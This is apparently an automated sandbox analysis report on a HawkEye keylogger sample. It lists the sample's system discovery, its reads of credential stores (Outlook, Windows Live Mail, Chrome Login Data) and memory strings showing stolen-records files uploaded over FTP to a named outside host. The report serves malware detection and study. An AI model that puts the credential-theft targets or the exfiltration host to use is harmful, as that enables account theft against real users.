Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Users\user\Desktop\tDb0ggawON.exe VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 14_2_0041604B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_00407674 GetVersionExW, 14_2_00407674
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 15_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 15_2_0040724C
Source: C:\Users\user\Desktop\tDb0ggawON.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\tDb0ggawON.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4009930.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.4009930.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337820875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2272, type: MEMORYSTR
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword (15_2_00402D9A)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword (15_2_00402D9A)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: ESMTPPassword (15_2_004033D7)
                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: vbc.exe PID: 1632, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                  Remote Access Functionality

                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: tp://ctlmanchutimefashion.com/HawkEye_Keylog~/
                  Source: tDb0ggawON.exe, 0000000B.00000002.520275691.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: maftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: ftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400%202.14.2022%209:51:52%20AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518121417.0000000003230000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: mgftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_287400%202.14.2022%209:51:52%20AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: HawkEyeKeylogger
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: m&HawkEye_Keylogger_Execution_Confirmed_
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: m"HawkEye_Keylogger_Stealer_Records_
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: mAHawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txtP
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: mHSTOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                  MITRE ATT&CK Matrix (tactic columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact)
                  Source | Detection | Scanner | Label
                  tDb0ggawON.exe | 33% | Virustotal |
                  tDb0ggawON.exe | 15% | Metadefender |
                  tDb0ggawON.exe | 40% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                  tDb0ggawON.exe | 100% | Avira | HEUR/AGEN.1140941
                  tDb0ggawON.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  11.0.tDb0ggawON.exe.ba0000.25.unpack | 100% | Avira | HEUR/AGEN.1140941
                  14.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1210557
                  15.0.vbc.exe.400000.4.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.400000.21.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                  11.0.tDb0ggawON.exe.400000.21.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.2.unpack | 100% | Avira | HEUR/AGEN.1140941
                  15.0.vbc.exe.400000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.3.unpack | 100% | Avira | HEUR/AGEN.1140941
                  15.0.vbc.exe.400000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.15.unpack | 100% | Avira | HEUR/AGEN.1140941
                  11.0.tDb0ggawON.exe.ba0000.10.unpack | 100% | Avira | HEUR/AGEN.1140941
                  14.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1210557
                  0.0.tDb0ggawON.exe.fb0000.0.unpack | 100% | Avira | HEUR/AGEN.1140941
                  14.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1210557
                  11.0.tDb0ggawON.exe.400000.11.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                  11.0.tDb0ggawON.exe.400000.11.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  15.0.vbc.exe.400000.1.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.400000.4.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                  11.0.tDb0ggawON.exe.400000.4.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  14.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1210557
                  11.2.tDb0ggawON.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                  11.2.tDb0ggawON.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.20.unpack | 100% | Avira | HEUR/AGEN.1140941
                  11.0.tDb0ggawON.exe.400000.16.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                  11.0.tDb0ggawON.exe.400000.16.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  15.0.vbc.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.5.unpack | 100% | Avira | HEUR/AGEN.1140941
                  14.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1210557
                  11.0.tDb0ggawON.exe.400000.6.unpack | 100% | Avira | TR/AD.MExecute.lzrac
